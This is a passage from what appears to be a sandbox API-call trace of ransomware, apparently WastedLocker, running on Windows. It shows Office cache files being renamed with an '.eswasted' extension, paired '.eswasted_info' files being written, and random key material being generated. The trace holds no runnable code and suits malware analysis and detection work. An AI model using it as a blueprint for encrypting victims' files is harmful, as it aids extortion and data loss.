[0070.241] WriteFile (in: hFile=0x11c, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.241] SetEndOfFile (hFile=0x11c) returned 1 [0070.242] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.242] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0070.242] lstrcpyW (in: lpString1=0x4d9498, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.242] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0070.242] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0070.242] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x648 [0070.243] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x648) returned 0x2d0000 [0070.243] CloseHandle (hObject=0x114) returned 1 [0070.247] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0070.247] CloseHandle (hObject=0x110) returned 1 [0070.247] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d96b0 [0070.247] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4c4048) returned 1 [0070.248] CryptGenRandom (in: hProv=0x4c4048, dwLen=0x1b8, pbBuffer=0x4d96f8 | out: pbBuffer=0x4d96f8) returned 1 [0070.248] CryptReleaseContext (hProv=0x4c4048, dwFlags=0x0) returned 1 [0070.248] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4c4048) returned 1 [0070.248] CryptGenRandom (in: hProv=0x4c4048, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.248] CryptReleaseContext (hProv=0x4c4048, dwFlags=0x0) returned 1 [0070.257] SetEndOfFile (hFile=0x11c) returned 1 [0070.259] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0070.259] CloseHandle (hObject=0x11c) returned 1 [0070.261] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.261] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d98c0 | out: hHeap=0x4a0000) returned 1 [0070.261] WaitForMultipleObjects (nCount=0x2, lpHandles=0x121ff80*=0xec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0070.264] _aulldvrm () returned 0x0 [0070.264] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4d9590) returned 1 [0070.265] CryptGenRandom (in: hProv=0x4d9590, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.265] CryptReleaseContext (hProv=0x4d9590, dwFlags=0x0) returned 1 [0070.265] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0070.265] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ac) returned 0x4d9590 [0070.265] lstrcpyW (in: lpString1=0x4d9632, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.265] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4d9848 [0070.265] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4da298) returned 1 [0070.266] CryptGenRandom (in: hProv=0x4da298, dwLen=0xa46, pbBuffer=0x4d9848 | out: pbBuffer=0x4d9848) returned 1 [0070.266] CryptReleaseContext (hProv=0x4da298, dwFlags=0x0) returned 1 [0070.266] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.267] WriteFile (in: hFile=0x11c, lpBuffer=0x4d9848*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4d9848*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.268] SetEndOfFile (hFile=0x11c) returned 1 [0070.268] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.268] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9848 | out: hHeap=0x4a0000) returned 1 [0070.268] lstrcpyW (in: lpString1=0x4d9632, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.eswasted")) returned 1 [0070.269] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.269] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0070.269] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xc72 [0070.269] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc72) returned 0x2d0000 [0070.269] CloseHandle (hObject=0x110) returned 1 [0070.273] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0070.273] CloseHandle (hObject=0x114) returned 1 [0070.273] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d9848 [0070.273] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4d9a50) returned 1 [0070.274] CryptGenRandom (in: hProv=0x4d9a50, dwLen=0x1b8, pbBuffer=0x4d9890 | out: pbBuffer=0x4d9890) returned 1 [0070.274] CryptReleaseContext (hProv=0x4d9a50, dwFlags=0x0) returned 1 [0070.274] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4d9a50) returned 1 [0070.275] CryptGenRandom (in: hProv=0x4d9a50, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.275] CryptReleaseContext (hProv=0x4d9a50, dwFlags=0x0) returned 1 [0070.284] SetEndOfFile (hFile=0x11c) returned 1 [0070.286] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0070.286] CloseHandle (hObject=0x11c) returned 1 [0070.287] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9590 | out: hHeap=0x4a0000) returned 1 [0070.287] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c4010 | out: hHeap=0x4a0000) returned 1 [0070.287] ResetEvent (hEvent=0xec) returned 1 [0070.287] _aulldvrm () returned 0x0 [0070.287] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4c4048) returned 1 [0070.288] CryptGenRandom (in: hProv=0x4c4048, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.288] CryptReleaseContext (hProv=0x4c4048, dwFlags=0x0) returned 1 [0070.288] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.288] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4d9590 [0070.288] lstrcpyW (in: lpString1=0x4d9628, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.288] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4d9840 [0070.288] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4da2c8) returned 1 [0070.289] CryptGenRandom (in: hProv=0x4da2c8, dwLen=0xa46, pbBuffer=0x4d9840 | out: pbBuffer=0x4d9840) returned 1 [0070.289] CryptReleaseContext (hProv=0x4da2c8, dwFlags=0x0) returned 1 [0070.289] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.289] WriteFile (in: hFile=0x11c, lpBuffer=0x4d9840*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4d9840*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.290] SetEndOfFile (hFile=0x11c) returned 1 [0070.290] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.290] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9840 | out: hHeap=0x4a0000) returned 1 [0070.290] lstrcpyW (in: lpString1=0x4d9628, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.292] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0070.292] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0070.292] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x106f [0070.292] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x106f) returned 0x2d0000 [0070.292] CloseHandle (hObject=0x114) returned 1 [0070.294] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0070.295] CloseHandle (hObject=0x110) returned 1 [0070.295] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d9840 [0070.295] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4c4048) returned 1 [0070.295] CryptGenRandom (in: hProv=0x4c4048, dwLen=0x1b8, pbBuffer=0x4d9888 | out: pbBuffer=0x4d9888) returned 1 [0070.295] CryptReleaseContext (hProv=0x4c4048, dwFlags=0x0) returned 1 [0070.295] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4da280) returned 1 [0070.296] CryptGenRandom (in: hProv=0x4da280, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.296] CryptReleaseContext (hProv=0x4da280, dwFlags=0x0) returned 1 [0070.305] SetEndOfFile (hFile=0x11c) returned 1 [0070.333] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd8a8 | out: hHeap=0x4a0000) returned 1 [0070.333] CloseHandle (hObject=0x11c) returned 1 [0070.335] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9590 | out: hHeap=0x4a0000) returned 1 [0070.335] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.335] _aulldvrm () returned 0x0 [0070.335] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4c4108) returned 1 [0070.335] CryptGenRandom (in: hProv=0x4c4108, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.335] CryptReleaseContext (hProv=0x4c4108, dwFlags=0x0) returned 1 [0070.336] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.336] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4d9590 [0070.336] lstrcpyW (in: lpString1=0x4d9628, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.336] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd7f8 [0070.336] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4c4108) returned 1 [0070.337] CryptGenRandom (in: hProv=0x4c4108, dwLen=0xa46, pbBuffer=0x4dd7f8 | out: pbBuffer=0x4dd7f8) returned 1 [0070.337] CryptReleaseContext (hProv=0x4c4108, dwFlags=0x0) returned 1 [0070.337] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.339] WriteFile (in: hFile=0x110, lpBuffer=0x4dd7f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd7f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.340] SetEndOfFile (hFile=0x110) returned 1 [0070.340] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.340] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd7f8 | out: hHeap=0x4a0000) returned 1 [0070.340] lstrcpyW (in: lpString1=0x4d9628, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.341] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.341] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0070.341] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0070.341] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x978 [0070.341] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x978) returned 0x2d0000 [0070.341] CloseHandle (hObject=0x114) returned 1 [0070.344] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0070.344] CloseHandle (hObject=0x118) returned 1 [0070.344] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4dd7f8 [0070.344] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4c4108) returned 1 [0070.345] CryptGenRandom (in: hProv=0x4c4108, dwLen=0x1b8, pbBuffer=0x4dd840 | out: pbBuffer=0x4dd840) returned 1 [0070.345] CryptReleaseContext (hProv=0x4c4108, dwFlags=0x0) returned 1 [0070.345] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4c4108) returned 1 [0070.346] CryptGenRandom (in: hProv=0x4c4108, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.346] CryptReleaseContext (hProv=0x4c4108, dwFlags=0x0) returned 1 [0070.355] SetEndOfFile (hFile=0x110) returned 1 [0070.357] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0410 | out: hHeap=0x4a0000) returned 1 [0070.357] CloseHandle (hObject=0x110) returned 1 [0070.358] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9590 | out: hHeap=0x4a0000) returned 1 [0070.358] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4da248 | out: hHeap=0x4a0000) returned 1 [0070.359] _aulldvrm () returned 0x0 [0070.359] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4c4108) returned 1 [0070.359] CryptGenRandom (in: hProv=0x4c4108, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.359] CryptReleaseContext (hProv=0x4c4108, dwFlags=0x0) returned 1 [0070.359] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0070.359] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a6) returned 0x4d9590 [0070.359] lstrcpyW (in: lpString1=0x4d962c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.359] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd7f8 [0070.359] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4c4108) returned 1 [0070.360] CryptGenRandom (in: hProv=0x4c4108, dwLen=0xa46, pbBuffer=0x4dd7f8 | out: pbBuffer=0x4dd7f8) returned 1 [0070.361] CryptReleaseContext (hProv=0x4c4108, dwFlags=0x0) returned 1 [0070.361] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.361] WriteFile (in: hFile=0x110, lpBuffer=0x4dd7f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd7f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.362] SetEndOfFile (hFile=0x110) returned 1 [0070.362] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.362] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd7f8 | out: hHeap=0x4a0000) returned 1 [0070.362] lstrcpyW (in: lpString1=0x4d962c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.362] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.eswasted")) returned 1 [0070.363] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0070.363] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0070.363] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x708 [0070.363] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x708) returned 0x2d0000 [0070.363] CloseHandle (hObject=0x118) returned 1 [0070.367] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0070.367] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4c4108) returned 1 [0070.369] CryptGenRandom (in: hProv=0x4c4108, dwLen=0x1b8, pbBuffer=0x4dd840 | out: pbBuffer=0x4dd840) returned 1 [0070.369] CryptReleaseContext (hProv=0x4c4108, dwFlags=0x0) returned 1 [0070.369] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4da2f8) returned 1 [0070.370] CryptGenRandom (in: hProv=0x4da2f8, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.370] CryptReleaseContext (hProv=0x4da2f8, dwFlags=0x0) returned 1 [0070.378] SetEndOfFile (hFile=0x110) returned 1 [0070.380] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de9f0 | out: hHeap=0x4a0000) returned 1 [0070.380] CloseHandle (hObject=0x110) returned 1 [0070.385] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9590 | out: hHeap=0x4a0000) returned 1 [0070.385] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c4010 | out: hHeap=0x4a0000) returned 1 [0070.385] _aulldvrm () returned 0x0 [0070.385] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4c4010) returned 1 [0070.386] CryptGenRandom (in: hProv=0x4c4010, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.386] CryptReleaseContext (hProv=0x4c4010, dwFlags=0x0) returned 1 [0070.386] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0070.386] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b4) returned 0x4d9400 [0070.386] lstrcpyW (in: lpString1=0x4d94aa, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.386] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4de9f0 [0070.386] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4d96c0) returned 1 [0070.386] CryptGenRandom (in: hProv=0x4d96c0, dwLen=0xa46, pbBuffer=0x4de9f0 | out: pbBuffer=0x4de9f0) returned 1 [0070.386] CryptReleaseContext (hProv=0x4d96c0, dwFlags=0x0) returned 1 [0070.387] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.387] WriteFile (in: hFile=0x110, lpBuffer=0x4de9f0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: 